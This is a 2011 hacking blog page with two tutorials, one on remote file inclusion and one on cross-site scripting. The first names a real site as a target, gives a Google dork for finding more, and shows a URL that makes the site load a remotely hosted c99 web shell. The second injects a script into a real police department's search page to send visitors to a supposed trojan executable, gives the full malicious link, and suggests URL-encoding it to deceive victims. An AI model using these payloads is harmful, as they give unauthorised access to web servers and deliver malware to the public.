Hacking Website Using Remote File Inclusion

Kamis, 01 Desember 2011

Welcome back to hacking-class.In this article I will tell about Remote file inclusion It is basically  one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it..

1-Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a url similar to the below one

www.Targetsite.com/index.php?page=Anything

The Google Dork is

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker normaly use the following command

www.targetsite.com/index.php?page=www.google.com

But as I am Posting this here so the links must be hatke :P

I found this site it is very good to give you example

http://www.cbspk.com

Now we wanna check if it is vulnerable .. we type

http://www.cbspk.com/v2/index.php?page=http://www.hacking-class.blogspot.comhttp://www.cbspk.com/v2/index.php?page=http://www.hacking-class.blogspot.com

Now This appears 

A website opens in another website this means this website is vulnerable to RFI.

You can also type

http://www.cbspk.com/v2/index.php?page=http://www.google.com

and u will get some similar results.

Ok now Moving On to the next part...


Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. 

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is.

http://h1.ripway.com/saurav1234/c99shell.php?

Now here how the hacker will execute the command  on the website

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/saurav1234/c99shell.php?

Now whoila We have executed the shell

 Now I will not tell how to run your scripts using the shell try finding out your self.

NOte- Remember to add “?” at the end of url or else the shell will not execute..

This is for educational purposes only using this knowledge in a illegal way  is strictly prohibited.

Read Post | komentar

Basic XSS Tutorial for website hacking

Intro:In this tutorial i will show youhow XSS works and how you can use it..

What is an XSS ?An XSS is an vurnability in an web-applicationthat can cause hackers to execute scripts on the client side...

Dangers of XSS...these day's browser keep some of the dangers of XSS outside..Like.. if an script want to write/edit edit files on the computer it needs extra permission from the user...or by some browsers it just get blocked...

How does XSS Work ?
if an user posts something to an webpage ( ex: http://search.live.com/ )the search engine shows what KeyWord the user typed..
Example:
The keyword given was: www.djoedjoe.com
You see that the search engine outputs the keyword again.
If an web-aplication processes the input from the user
without filtering, for example the user input: xss-tutorial

it will be like this in the source:........
Your keyword was: xss-tutotorial
In this case its seems very normal:
But what if the user input was:
<script>alert("xss-tutorial");</script>

it would be in the source like this:.....

Your keyword was:
<script>alert("xss-tutorial");</script>
this doesnt look very normal on the screen:


So what happend, is that the user input was actually a javascript.. that didnt got filter by the web-application.
Well this happens when an web-application ( like an search engine ) doesnt filter the user-input: 1. As keyword you enter an javascript..
2. the search engine checks if youre keywords matches the records, and then builds an page with the results..
3. the SearchEngine builds the rest of the page ( like ads and stuff ).. and s directly ( without filtering it first ) puts your keyword in the page too...
4. The webserver sends the page ( source ) to you...
5. Your browser reads every line/code from the source and shows it on the screen.
6. finally the browser also reads your javascript input .. & executes it.
=======================
How to find and use xss ?
=======================
XSS is dangrous because people get mislead easily..There are scripts that like. steal user-cookies ...hackers can abuse those stolen cookies..Im not going further on cookie-stealing, but i will giveyou an other example on how to abuse xss vurnability's...Like i said, you can mislead people by using those XSS Vurnability's...You can someone to make download something,By using an XSS on an trusted website..
Example:
You won't expect that downloading something from http://www.lapdonline.org/, would be somekind of malware ( trojan or something )..Well lets see if we can change that...We gonna search for an XSS vurnabiity on that website...Goto.. http://www.lapdonline.org/You will see an search functions under the banner..Lets see if the search engine filters our keyword...Enter as keyword:
<script>alert("test");</script>Click then on GO..Yeahh, it worked !
=============================
Well how can we abuse this ??
=============================
we can put javascripts as keywords..And most people would suspect hat website of something bad...So its good enough to mislead people with it..We could enter an javascript that would redirect people to an trojan.. ( in this im not using an trojan )..well if that is wha we want to do..We will using this little script then:
<script>document.location="http:/www.technoplex.co.cc/policescanner.exe";</script>
go back to:
http://www.lapdonline.org/And enter that script in the search engine and click on go...


ohk at there.. we have been redirected to our file...This file named: policescanner.exe , could be an trojanYou could go in to an chat room or communityand say its an police scanner !You would just gave the link in your browser then, http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://www.technoplex.co.cc/policescanner.exe%22;%3C/script%3E
People mostly read the first part of the link, before clicking on it... in this case: http://www.lapdonline.org/

Well, they gonna think its an LAPD website, and your talking about an police scanner, so why not download it ?Maybe when someone looks closely and he might see the link to your trojan...
http://tuts.djoedjoe.com/basicxss/eng/policescanner.exeand they will notice its fake...but no worry's, with an URL-Encoder you can 'mask' that ...

Read Post | komentar